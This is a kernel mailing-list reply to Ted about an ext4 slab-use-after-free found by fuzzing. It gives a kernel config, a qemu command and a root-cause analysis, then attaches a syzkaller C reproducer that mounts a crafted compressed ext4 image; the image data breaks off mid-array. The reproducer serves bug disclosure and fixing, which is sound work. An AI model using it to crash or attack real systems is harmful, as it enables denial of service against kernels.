Re: Re: [PATCH] ext4: Fix KASAN slab-use-after-free in ext4_find_extent due to corrupted eh_entries

From: 余昊铖
Date: Tue Dec 02 2025 - 02:47:18 EST

Hi,

Thank you for your advice. For the reproduction, I can trigger 'BUG: KASAN: slab-use-after-free in ext4_find_extent' on my computer stably using the original reproducer. And I only modified a few options in the kernel config(the exact kernel config is in the attachments):


CONFIG_KCOV=y

CONFIG_DEBUG_INFO_DWARF4=y

CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y

CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y

CONFIG_VIRTIO_NET=y
CONFIG_E1000=y
CONFIG_E1000E=y

CONFIG_CMDLINE_BOOL=y
CONFIG_CMDLINE="net.ifnames=0"


And I run the reproducer in qemu with command:


sudo qemu-system-x86_64 \
-m 2G \
-smp 2 \
-kernel /mushome/lizao/patch/linux-6.12.51/arch/x86/boot/bzImage \
-append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0 panic_on_warn=1 panic_on_oops=1" \
-drive file=/mushome/lizao/patch/image/bullseye.img,format=raw \
-net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
-net nic,model=e1000 \
-enable-kvm \
-nographic \
-pidfile vm.pid \
2>&1 | tee vm.log


So I think something went wrong when I simplified the reproducer. Sorry for my mistake.

And for the deeper analysis, in ext4_iget() (fs/ext4/inode.c), we only call ext4_ext_check_inode() if the inode does not have inline
data. But the malicious image sets both EXT4_INODE_EXTENTS and EXT4_INLINE_DATA on inode #15. This combination is normally contradictory, but ext4 accepts it, so the inline-data guard short-circuits the extent sanity check entirely. Because of that, the extent root stored inside i_block is never validated even though this inode is later treated as an extent-based regular file. When ext4_find_extent() runs, it trusts the forged header (eh_entries >> eh_max) and calls ext4_ext_binsearch(), which in turn uses EXT_LAST_EXTENT() and walks well past the inline i_block area. The pointers land in unrelated slab objects and trigger the KASAN slab-UAF you saw.

The core bug is that ext4 permits EXT4_INLINE_DATA and EXT4_INODE_EXTENTS to coexist without revalidating the inline extent tree. A crafted inode can therefore bypass __ext4_ext_check(), poison eh_entries, and later crash the kernel as soon as any extent traversal occurs.

Hope this clarifies the root cause and why my patch is validate. Thanks.


> On Mon, Dec 01, 2025 at 11:17:12PM +0800, ????????? wrote:
> > Hello,
> >
> > I would like to report a potential security issue in the Linux
> > kernel ext4 filesystem, which I found using a modified
> > syzkaller-based kernel fuzzing tool that I developed.
>
> Thank you for submitting this bug report, and thank you for doing the
> work to create a simplified reproducer and doing the initial analysis.
> It is much appreciated. Unfortunately, I haven't been able to
> reproduce the issue. You didn't send me the exact kernel config that
> you used, so I used my default kernel config that I use by testing
> via:
>
> % install-kconfig --kasan
> % kbuild
>
> ... using the kvm-xfstests utilities that can be found at [1], in the
> kernel-build directory.
>
> https://github.com/tytso/xfstests-bld
>
> I tried using both the latest mainline kernel, as well as 6.12.51,
> this that was your reported that you were doing your testing.
>
> % kvm-xfstests shell
> ...
> root@kvm-xfstests:~# uname -a
> Linux kvm-xfstests 6.18.0-rc7-xfstests-kasan-01168-g7b2a79c93971 #312 SMP PREEMPT_DYNAMIC Mon Dec 1 21:30:56 EST 2025 x86_64 GNU/Linux
> root@kvm-xfstests:~# cd /vtmp/
> root@kvm-xfstests:/vtmp# ./repro_simplified
> [*] Using loop device: /dev/loop0
> [ 14.949088] loop0: detected capacity change from 0 to 512
> [ 14.953285] EXT4-fs warning (device loop0): ext4_multi_mount_protect:324: MMP interval 42 higher than expected, please wait.
> [ 14.953285]
> [ 59.461261] EXT4-fs (loop0): warning: mounting unchecked fs, running e2fsck is recommended
> [ 59.463299] EXT4-fs (loop0): mounted filesystem 00000000-0000-0000-0000-000000000000 r/w without journal. Quota mode: writeback.
> [*] Mounted image.img to ./mnt
> [*] Triggering bug...
> [*] sendfile returned: 170
> [*] Done. If kernel didn't crash, the repro finished.
> root@kvm-xfstests:/vtmp#
>
> So I then took a look at the code in question, and at your proposed
> patch. If you could do some more analysis, please take a look at all
> of the checks done by the function __ext4_ext_check(), which
> implements the checks in the functions ext4_ext_check_inode() and
> ext4_ext_check(). These functions get called when the inode is read
> into memory (for the root extent tree in the inode) or when an extent
> tree block is read into memory.
>
> So I'm not sure why your patch would make a difference --- and given
> that your simplified reproducer isn't triggering the crash, even when
> KASAN is enabled, I can't validate whether your patch *would* make a
> difference.
>
> Could you try to do a deeper analysis? Thanks,
>
> - Ted

Attachment: .config
Description: Binary data

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <setjmp.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#include <linux/loop.h>

#ifndef __NR_memfd_create
#define __NR_memfd_create 319
#endif

static unsigned long long procid;

static long syz_create_resource(volatile long val)
{
return val;
}

//% This code is derived from puff.{c,h}, found in the zlib development. The
//% original files come with the following copyright notice:

//% Copyright (C) 2002-2013 Mark Adler, all rights reserved
//% version 2.3, 21 Jan 2013
//% This software is provided 'as-is', without any express or implied
//% warranty. In no event will the author be held liable for any damages
//% arising from the use of this software.
//% Permission is granted to anyone to use this software for any purpose,
//% including commercial applications, and to alter it and redistribute it
//% freely, subject to the following restrictions:
//% 1. The origin of this software must not be misrepresented; you must not
//% claim that you wrote the original software. If you use this software
//% in a product, an acknowledgment in the product documentation would be
//% appreciated but is not required.
//% 2. Altered source versions must be plainly marked as such, and must not be
//% misrepresented as being the original software.
//% 3. This notice may not be removed or altered from any source distribution.
//% Mark Adler madler@xxxxxxxxxxxxxxxxxx

//% BEGIN CODE DERIVED FROM puff.{c,h}

#define MAXBITS 15
#define MAXLCODES 286
#define MAXDCODES 30
#define MAXCODES (MAXLCODES + MAXDCODES)
#define FIXLCODES 288

struct puff_state {
unsigned char* out;
unsigned long outlen;
unsigned long outcnt;
const unsigned char* in;
unsigned long inlen;
unsigned long incnt;
int bitbuf;
int bitcnt;
jmp_buf env;
};
static int puff_bits(struct puff_state* s, int need)
{
long val = s->bitbuf;
while (s->bitcnt < need) {
if (s->incnt == s->inlen)
longjmp(s->env, 1);
val |= (long)(s->in[s->incnt++]) << s->bitcnt;
s->bitcnt += 8;
}
s->bitbuf = (int)(val >> need);
s->bitcnt -= need;
return (int)(val & ((1L << need) - 1));
}
static int puff_stored(struct puff_state* s)
{
s->bitbuf = 0;
s->bitcnt = 0;
if (s->incnt + 4 > s->inlen)
return 2;
unsigned len = s->in[s->incnt++];
len |= s->in[s->incnt++] << 8;
if (s->in[s->incnt++] != (~len & 0xff) ||
s->in[s->incnt++] != ((~len >> 8) & 0xff))
return -2;
if (s->incnt + len > s->inlen)
return 2;
if (s->outcnt + len > s->outlen)
return 1;
for (; len--; s->outcnt++, s->incnt++) {
if (s->in[s->incnt])
s->out[s->outcnt] = s->in[s->incnt];
}
return 0;
}
struct puff_huffman {
short* count;
short* symbol;
};
static int puff_decode(struct puff_state* s, const struct puff_huffman* h)
{
int first = 0;
int index = 0;
int bitbuf = s->bitbuf;
int left = s->bitcnt;
int code = first = index = 0;
int len = 1;
short* next = h->count + 1;
while (1) {
while (left--) {
code |= bitbuf & 1;
bitbuf >>= 1;
int count = *next++;
if (code - count < first) {
s->bitbuf = bitbuf;
s->bitcnt = (s->bitcnt - len) & 7;
return h->symbol[index + (code - first)];
}
index += count;
first += count;
first <<= 1;
code <<= 1;
len++;
}
left = (MAXBITS + 1) - len;
if (left == 0)
break;
if (s->incnt == s->inlen)
longjmp(s->env, 1);
bitbuf = s->in[s->incnt++];
if (left > 8)
left = 8;
}
return -10;
}
static int puff_construct(struct puff_huffman* h, const short* length, int n)
{
int len;
for (len = 0; len <= MAXBITS; len++)
h->count[len] = 0;
int symbol;
for (symbol = 0; symbol < n; symbol++)
(h->count[length[symbol]])++;
if (h->count[0] == n)
return 0;
int left = 1;
for (len = 1; len <= MAXBITS; len++) {
left <<= 1;
left -= h->count[len];
if (left < 0)
return left;
}
short offs[MAXBITS + 1];
offs[1] = 0;
for (len = 1; len < MAXBITS; len++)
offs[len + 1] = offs[len] + h->count[len];
for (symbol = 0; symbol < n; symbol++)
if (length[symbol] != 0)
h->symbol[offs[length[symbol]]++] = symbol;
return left;
}
static int puff_codes(struct puff_state* s, const struct puff_huffman* lencode,
const struct puff_huffman* distcode)
{
static const short lens[29] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 13,
15, 17, 19, 23, 27, 31, 35, 43, 51, 59,
67, 83, 99, 115, 131, 163, 195, 227, 258};
static const short lext[29] = {0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2,
2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0};
static const short dists[30] = {
1, 2, 3, 4, 5, 7, 9, 13, 17, 25,
33, 49, 65, 97, 129, 193, 257, 385, 513, 769,
1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577};
static const short dext[30] = {0, 0, 0, 0, 1, 1, 2, 2, 3, 3,
4, 4, 5, 5, 6, 6, 7, 7, 8, 8,
9, 9, 10, 10, 11, 11, 12, 12, 13, 13};
int symbol;
do {
symbol = puff_decode(s, lencode);
if (symbol < 0)
return symbol;
if (symbol < 256) {
if (s->outcnt == s->outlen)
return 1;
if (symbol)
s->out[s->outcnt] = symbol;
s->outcnt++;
} else if (symbol > 256) {
symbol -= 257;
if (symbol >= 29)
return -10;
int len = lens[symbol] + puff_bits(s, lext[symbol]);
symbol = puff_decode(s, distcode);
if (symbol < 0)
return symbol;
unsigned dist = dists[symbol] + puff_bits(s, dext[symbol]);
if (dist > s->outcnt)
return -11;
if (s->outcnt + len > s->outlen)
return 1;
while (len--) {
if (dist <= s->outcnt && s->out[s->outcnt - dist])
s->out[s->outcnt] = s->out[s->outcnt - dist];
s->outcnt++;
}
}
} while (symbol != 256);
return 0;
}
static int puff_fixed(struct puff_state* s)
{
static int virgin = 1;
static short lencnt[MAXBITS + 1], lensym[FIXLCODES];
static short distcnt[MAXBITS + 1], distsym[MAXDCODES];
static struct puff_huffman lencode, distcode;
if (virgin) {
lencode.count = lencnt;
lencode.symbol = lensym;
distcode.count = distcnt;
distcode.symbol = distsym;
short lengths[FIXLCODES];
int symbol;
for (symbol = 0; symbol < 144; symbol++)
lengths[symbol] = 8;
for (; symbol < 256; symbol++)
lengths[symbol] = 9;
for (; symbol < 280; symbol++)
lengths[symbol] = 7;
for (; symbol < FIXLCODES; symbol++)
lengths[symbol] = 8;
puff_construct(&lencode, lengths, FIXLCODES);
for (symbol = 0; symbol < MAXDCODES; symbol++)
lengths[symbol] = 5;
puff_construct(&distcode, lengths, MAXDCODES);
virgin = 0;
}
return puff_codes(s, &lencode, &distcode);
}
static int puff_dynamic(struct puff_state* s)
{
static const short order[19] = {16, 17, 18, 0, 8, 7, 9, 6, 10, 5,
11, 4, 12, 3, 13, 2, 14, 1, 15};
int nlen = puff_bits(s, 5) + 257;
int ndist = puff_bits(s, 5) + 1;
int ncode = puff_bits(s, 4) + 4;
if (nlen > MAXLCODES || ndist > MAXDCODES)
return -3;
short lengths[MAXCODES];
int index;
for (index = 0; index < ncode; index++)
lengths[order[index]] = puff_bits(s, 3);
for (; index < 19; index++)
lengths[order[index]] = 0;
short lencnt[MAXBITS + 1], lensym[MAXLCODES];
struct puff_huffman lencode = {lencnt, lensym};
int err = puff_construct(&lencode, lengths, 19);
if (err != 0)
return -4;
index = 0;
while (index < nlen + ndist) {
int symbol;
int len;
symbol = puff_decode(s, &lencode);
if (symbol < 0)
return symbol;
if (symbol < 16)
lengths[index++] = symbol;
else {
len = 0;
if (symbol == 16) {
if (index == 0)
return -5;
len = lengths[index - 1];
symbol = 3 + puff_bits(s, 2);
} else if (symbol == 17)
symbol = 3 + puff_bits(s, 3);
else
symbol = 11 + puff_bits(s, 7);
if (index + symbol > nlen + ndist)
return -6;
while (symbol--)
lengths[index++] = len;
}
}
if (lengths[256] == 0)
return -9;
err = puff_construct(&lencode, lengths, nlen);
if (err && (err < 0 || nlen != lencode.count[0] + lencode.count[1]))
return -7;
short distcnt[MAXBITS + 1], distsym[MAXDCODES];
struct puff_huffman distcode = {distcnt, distsym};
err = puff_construct(&distcode, lengths + nlen, ndist);
if (err && (err < 0 || ndist != distcode.count[0] + distcode.count[1]))
return -8;
return puff_codes(s, &lencode, &distcode);
}
static int puff(unsigned char* dest, unsigned long* destlen,
const unsigned char* source, unsigned long sourcelen)
{
struct puff_state s = {
.out = dest,
.outlen = *destlen,
.outcnt = 0,
.in = source,
.inlen = sourcelen,
.incnt = 0,
.bitbuf = 0,
.bitcnt = 0,
};
int err;
if (setjmp(s.env) != 0)
err = 2;
else {
int last;
do {
last = puff_bits(&s, 1);
int type = puff_bits(&s, 2);
err = type == 0 ? puff_stored(&s)
: (type == 1 ? puff_fixed(&s)
: (type == 2 ? puff_dynamic(&s) : -1));
if (err != 0)
break;
} while (!last);
}
*destlen = s.outcnt;
return err;
}

//% END CODE DERIVED FROM puff.{c,h}

#define ZLIB_HEADER_WIDTH 2

static int puff_zlib_to_file(const unsigned char* source,
unsigned long sourcelen, int dest_fd)
{
if (sourcelen < ZLIB_HEADER_WIDTH)
return 0;
source += ZLIB_HEADER_WIDTH;
sourcelen -= ZLIB_HEADER_WIDTH;
const unsigned long max_destlen = 132 << 20;
void* ret = mmap(0, max_destlen, PROT_WRITE | PROT_READ,
MAP_PRIVATE | MAP_ANON, -1, 0);
if (ret == MAP_FAILED)
return -1;
unsigned char* dest = (unsigned char*)ret;
unsigned long destlen = max_destlen;
int err = puff(dest, &destlen, source, sourcelen);
if (err) {
munmap(dest, max_destlen);
errno = -err;
return -1;
}
if (write(dest_fd, dest, destlen) != (ssize_t)destlen) {
munmap(dest, max_destlen);
return -1;
}
return munmap(dest, max_destlen);
}

static int setup_loop_device(unsigned char* data, unsigned long size,
const char* loopname, int* loopfd_p)
{
int err = 0, loopfd = -1;
int memfd = syscall(__NR_memfd_create, "syzkaller", 0);
if (memfd == -1) {
err = errno;
goto error;
}
if (puff_zlib_to_file(data, size, memfd)) {
err = errno;
goto error_close_memfd;
}
loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
err = errno;
goto error_close_memfd;
}
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
if (errno != EBUSY) {
err = errno;
goto error_close_loop;
}
ioctl(loopfd, LOOP_CLR_FD, 0);
usleep(1000);
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
err = errno;
goto error_close_loop;
}
}
close(memfd);
*loopfd_p = loopfd;
return 0;

error_close_loop:
close(loopfd);
error_close_memfd:
close(memfd);
error:
errno = err;
return -1;
}

static void reset_loop_device(const char* loopname)
{
int loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
return;
}
if (ioctl(loopfd, LOOP_CLR_FD, 0)) {
}
close(loopfd);
}

static long syz_mount_image(volatile long fsarg, volatile long dir,
volatile long flags, volatile long optsarg,
volatile long change_dir,
volatile unsigned long size, volatile long image)
{
unsigned char* data = (unsigned char*)image;
int res = -1, err = 0, need_loop_device = !!size;
char* mount_opts = (char*)optsarg;
char* target = (char*)dir;
char* fs = (char*)fsarg;
char* source = NULL;
char loopname[64];
if (need_loop_device) {
int loopfd;
memset(loopname, 0, sizeof(loopname));
snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
if (setup_loop_device(data, size, loopname, &loopfd) == -1)
return -1;
close(loopfd);
source = loopname;
}
mkdir(target, 0777);
char opts[256];
memset(opts, 0, sizeof(opts));
if (strlen(mount_opts) > (sizeof(opts) - 32)) {
}
strncpy(opts, mount_opts, sizeof(opts) - 32);
if (strcmp(fs, "iso9660") == 0) {
flags |= MS_RDONLY;
} else if (strncmp(fs, "ext", 3) == 0) {
bool has_remount_ro = false;
char* remount_ro_start = strstr(opts, "errors=remount-ro");
if (remount_ro_start != NULL) {
char after = *(remount_ro_start + strlen("errors=remount-ro"));
char before = remount_ro_start == opts ? '\0' : *(remount_ro_start - 1);
has_remount_ro = ((before == '\0' || before == ',') &&
(after == '\0' || after == ','));
}
if (strstr(opts, "errors=panic") || !has_remount_ro)
strcat(opts, ",errors=continue");
} else if (strcmp(fs, "xfs") == 0) {
strcat(opts, ",nouuid");
} else if (strncmp(fs, "gfs2", 4) == 0 &&
(strstr(opts, "errors=panic") || strstr(opts, "debug"))) {
strcat(opts, ",errors=withdraw");
}
res = mount(source, target, fs, flags, opts);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
res = open(target, O_RDONLY | O_DIRECTORY);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
if (change_dir) {
res = chdir(target);
if (res == -1) {
err = errno;
}
}

error_clear_loop:
if (need_loop_device)
reset_loop_device(loopname);
errno = err;
return res;
}

uint64_t r[4] = {0x0, 0xffffffffffffffff, 0x0, 0xffffffffffffffff};

int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// syz_mount_image$ext4 arguments: [
// fs: ptr[in, buffer] {
// buffer: {65 78 74 34 00} (length 0x5)
// }
// dir: ptr[in, buffer] {
// buffer: {2e 2f 66 69 6c 65 30 00} (length 0x8)
// }
// flags: mount_flags = 0x0 (8 bytes)
// opts: ptr[in, fs_options[ext4_options]] {
// fs_options[ext4_options] {
// elems: array[fs_opt_elem[ext4_options]] {
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// inode_readahead_blks: fs_opt["inode_readahead_blks", fmt[hex,
// flags[ext4_inode_readahead_blks]]] {
// name: buffer: {69 6e 6f 64 65 5f 72 65 61 64 61 68 65 61 64
// 5f 62 6c 6b 73} (length 0x14) eq: const = 0x3d (1 bytes)
// val: ext4_inode_readahead_blks = 0x200000 (18 bytes)
// }
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// usrjquota: buffer: {75 73 72 6a 71 75 6f 74 61 3d} (length
// 0xa)
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// nojournal_checksum: buffer: {6e 6f 6a 6f 75 72 6e 61 6c 5f 63
// 68 65 63 6b 73 75 6d} (length 0x12)
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// stripe: fs_opt["stripe", fmt[hex, int32]] {
// name: buffer: {73 74 72 69 70 65} (length 0x6)
// eq: const = 0x3d (1 bytes)
// val: int32 = 0x24 (18 bytes)
// }
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// usrquota: buffer: {75 73 72 71 75 6f 74 61} (length 0x8)
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// mb_optimize_scan: fs_opt["mb_optimize_scan", fmt[hex,
// int32[0:1]]] {
// name: buffer: {6d 62 5f 6f 70 74 69 6d 69 7a 65 5f 73 63 61
// 6e} (length 0x10) eq: const = 0x3d (1 bytes) val: int32 =
// 0x1 (18 bytes)
// }
// }
// comma: const = 0x2c (1 bytes)
// }
// }
// common: array[fs_opt_elem[fs_options_common]] {
// }
// null: const = 0x0 (1 bytes)
// }
// }
// chdir: int8 = 0x1 (1 bytes)
// size: len = 0x46f (8 bytes)
// img: ptr[in, buffer] {
// buffer: (compressed buffer with length 0x46f)
// }
// ]
// returns fd_dir
memcpy((void*)0x200000000b80, "ext4\000", 5);
memcpy((void*)0x200000000000, "./file0\000", 8);
memcpy((void*)0x200000000ac0, "inode_readahead_blks", 20);
*(uint8_t*)0x200000000ad4 = 0x3d;
sprintf((char*)0x200000000ad5, "0x%016llx", (long long)0x200000);
*(uint8_t*)0x200000000ae7 = 0x2c;
memcpy((void*)0x200000000ae8, "usrjquota=", 10);
*(uint8_t*)0x200000000af2 = 0x2c;
memcpy((void*)0x200000000af3, "nojournal_checksum", 18);
*(uint8_t*)0x200000000b05 = 0x2c;
memcpy((void*)0x200000000b06, "stripe", 6);
*(uint8_t*)0x200000000b0c = 0x3d;
sprintf((char*)0x200000000b0d, "0x%016llx", (long long)0x24);
*(uint8_t*)0x200000000b1f = 0x2c;
memcpy((void*)0x200000000b20, "usrquota", 8);
*(uint8_t*)0x200000000b28 = 0x2c;
memcpy((void*)0x200000000b29, "mb_optimize_scan", 16);
*(uint8_t*)0x200000000b39 = 0x3d;
sprintf((char*)0x200000000b3a, "0x%016llx", (long long)1);
*(uint8_t*)0x200000000b4c = 0x2c;
*(uint8_t*)0x200000000b4d = 0;
memcpy(
(void*)0x200000000540,
"\x78\x9c\xec\xdd\xbf\x6f\x5b\x55\x1b\x00\xe0\xf7\x3a\x3f\xbf\x34\x6d\xf2"
"\x41\x07\x84\x54\x11\x41\x25\x10\x55\xed\x38\x96\x2a\x65\x6b\x61\x60\xa1"
"\x08\xa9\x88\x81\x0e\x69\xd4\xba\x4e\x14\x3b\x8e\x62\x47\x6a\x32\xb5\x30"
"\xb2\xb2\x30\xb6\x0b\x5b\xda\x0d\x31\x20\xa1\x0e\x1d\x61\xe5\x6f\x40\xaa"
"\x40\x02\x26\x06\x23\xdb\xd7\xa9\x9b\xc4\x24\x85\xa4\x96\xe2\xe7\x91\x8e"
"\x7d\xce\x3d\x8e\xcf\xbd\x7e\xef\xbd\xe7\xea\x1d\x72\x02\x18\x58\x33\x11"
"\x71\x37\x22\x46\x23\xe2\x46\x44\x4c\xa5\xdb\x93\xb4\xc4\xe5\x76\x69\x7e"
"\x6e\xbb\xf0\x68\xa9\x59\x92\x68\x34\xae\xfd\x9a\xb4\xfa\x1f\x14\x1e\x2d"
"\x45\xd7\xdf\x34\x9d\x6a\xbe\x64\x22\x5e\x8b\x88\xc7\x1f\x24\x71\xe1\xee"
"\xde\x71\x6b\x9b\x5b\x2b\x8b\xe5\x72\x71\x3d\x6d\xe7\xea\x95\xb5\x5c\x6d"
"\x73\xeb\xe2\x72\x65\xb1\x54\x2c\x15\x57\xf3\xf9\x4b\xf3\x85\xc2\x6c\x7e"
"\x6e\xfe\xc8\x8e\x75\xe1\xf3\x27\x7f\x9e\x7b\xf8\xfe\x93\x2f\xce\xe7\xbe"
"\x8d\x2f\xbf\x7b\x2f\x89\xcb\x31\x99\xf6\x75\x1f\xc7\x51\x99\x89\x99\xf4"
"\x37\x19\x89\xd3\x5d\xdb\x87\x23\xe2\xda\x51\x0f\xd6\x67\x93\x5d\xf5\x64"
"\xb8\x8f\x3b\xc2\x0b\xc9\x44\xc4\x2b\x11\xf1\x66\xeb\xfa\x9f\x8a\xa1\x10"
"\x3c\x00\x38\xe9\x1a\x8d\xa9\x68\x4c\x75\xb7\x01\x80\x93\x2e\xd3\xca\xdd"
"\x24\x99\x6c\x9a\x0b\x98\x8c\x4c\x26\x9b\x6d\xe7\xf0\xce\xc6\x44\xa6\x5c"
"\xad\xd5\x2f\xdc\xae\x6e\xac\xde\x6a\xe7\x78\xa6\x63\x24\x73\x7b\xb9\x5c"
"\x9c\x4d\x73\x85\xd3\x31\x92\x34\xdb\xf9\x56\xfd\x59\x7b\x6e\x57\xbb\x10"
"\x11\xff\x8f\x88\xaf\xc6\xfe\xd7\x6a\x67\x6f\x56\xcb\xb7\xfa\xf9\xe0\x03"
"\x00\x03\xec\xd4\xae\xf9\xff\x8f\xb1\xf6\xfc\x0f\x00\x9c\x70\xe3\xfd\xde"
"\x01\x00\xe0\xa5\x33\xff\x03\xc0\xe0\x31\xff\x03\xc0\xe0\x31\xff\x03\xc0"
"\xe0\x31\xff\x03\xc0\xe0\x31\xff\x03\xc0\xe0\x31\xff\x03\x00\x00\xc0\x89"
"\xf6\xf1\xd5\xab\xcd\xd2\xd8\x4e\xd7\xbf\x58\xad\x96\x96\x57\x96\xd6\xe6"
"\xe7\x66\xb3\x95\x8d\x9b\xd9\x9b\xd5\xf5\xb5\x6c\xa9\x5a\x2d\xb5\xfe\x63"
"\x5f\xe5\xe0\xef\x2b\x57\xab\x6b\xf9\xb9\xd8\xb8\x93\xab\x17\x6b\xf5\x5c"
"\x6d\x73\x6b\xa1\x52\xdd\x58\xad\x2f\xb4\xd6\xf5\x58\x28\x8e\xbc\x84\x63"
"\x02\x00\xfe\xd9\xce\x3a\x5c\x2a\x2a\x2a\x2a\x3b\x95\x7e\xdf\x99\x80\xe3"
"\xf6\xec\xa2\xef\xf7\x9e\x00\x00\x00\x00\x00\x00\x47\xa5\xd1\x48\xac\xf9"
"\x0f\x00\x03\x66\xb2\xc7\xfa\xff\xa7\xbb\xd6\xee\x9f\x8d\x88\x33\x11\xf1"
"\xf3\xd8\xc8\x58\x67\xad\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x18\x04\x0f\x0a\x8f\x96\x3a\xa5\xdf\xfb\xc2\xcb\xf3\xf4\x4a\x44\x8c\xb7"
"\xe3\xbf\x9d\x96\x76\xcf\x70\x0c\xb7\xde\xc7\x63\x24\x22\x26\x7e\x4f\xd2"
"\x76\x5b\x12\x11\x43\x47\x30\xfe\x4c\x44\xfc\xf6\xa0\xf2\x7d\xb3\x44\x7a"
"\x1e\x1e\xc1\xd7\x02\x00\xd0\xc3\xdd\x7b\x11\x71\x63\x7a\x66\xef\xf3\xff"
"\xf3\xcf\x7b\xff\xc6\xe4\x21\x3e\x33\xb3\xab\xed\xf9\x0f\x00\x8e\xdf\x0f"
"\x57\x22\xe2\xf2\x7e\xf9\xbf\x4c\x3a\x37\x8f\xb7\x5e\x77\xe7\x7f\xc6\x5b"
"\x19\xa2\xff\xce\xfc\xdf\x5f\x9d\xfc\xdf\xf6\x9e\xfc\x5f\x66\x27\xff\x37"
"\xd4\x23\xff\xf7\xea\x21\xc7\xb8\xfe\xd1\xfd\x4f\x7b\xf5\x75\xe7\xff\x9a"
"\xa5\x39\x7e\x27\x17\xc8\xf1\x7b\x7a\x2f\xe2\xf5\xe1\xfd\xe2\x9f\xec\xc4"
"\x3f\xe9\x11\xff\x33\x87\x1c\xe3\xeb\x73\xdf\xd4\x7a\xf5\x89\x7f\x7f\x35"
"\xee\x47\xbc\x1d\xfb\xc7\xbf\xa3\x59\xcb\xd5\x2b\x6b\xb9\xda\xe6\xd6\xc5"
"\xe5\xca\x62\xa9\x58\x2a\xae\xe6\xf3\x97\xe6\x0b\x85\xd9\xfc\xdc\x7c\xee"
"\xf6\x72\xb9\x38\xdb\x7e\xdd\x77\x8c\x3b\x3f\xfd\xf5\xa4\xd7\xf8\xe2\xdf"
"\x5f\xcd\xeb\x7f\xa2\x47\xfc\x0f\xba\xff\x4f\x1d\x72\x8c\xd1\xb5\xc7\x2b"
"\xbd\xfa\x0e\x8e\x7f\xe6\x97\xd1\xe4\x93\xd6\xc9\x38\x9a\x6e\xb9\xb3\x58"
"\xaf\xaf\xe7\x23\x46\x93\x0f\xf7\x6e\x9f\x7b\x91\xa3\x1f\x3c\x9d\xdf\xa8"
"\xf3\x1b\x36\xe3\xff\xce\x5b\xfb\xcf\xff\x67\x5b\xef\x9d\xfb\xff\xd0\x73"
"\xf1\xcf\x44\xc4\x74\xfa\x9e\x49\xe3\x38\x9c\x9e\x17\xef\xee\x1a\xf3\x8d"
"\xeb\x0f\x7f\xec\xb5\x3f\xae\xff\xfe\x6a\xc6\xff\xd6\x01\xd7\x7f\xaf\xf9"
"\xff\xc2\x21\xc7\x38\x9f\x9b\xf8\xac\x57\x9f\xf8\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\xc0\x8b\xab\x6d\x6e\xad\x2c\x96\xcb\xc5\xf5\x63\xac\xf4\xfb"
"\x18\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
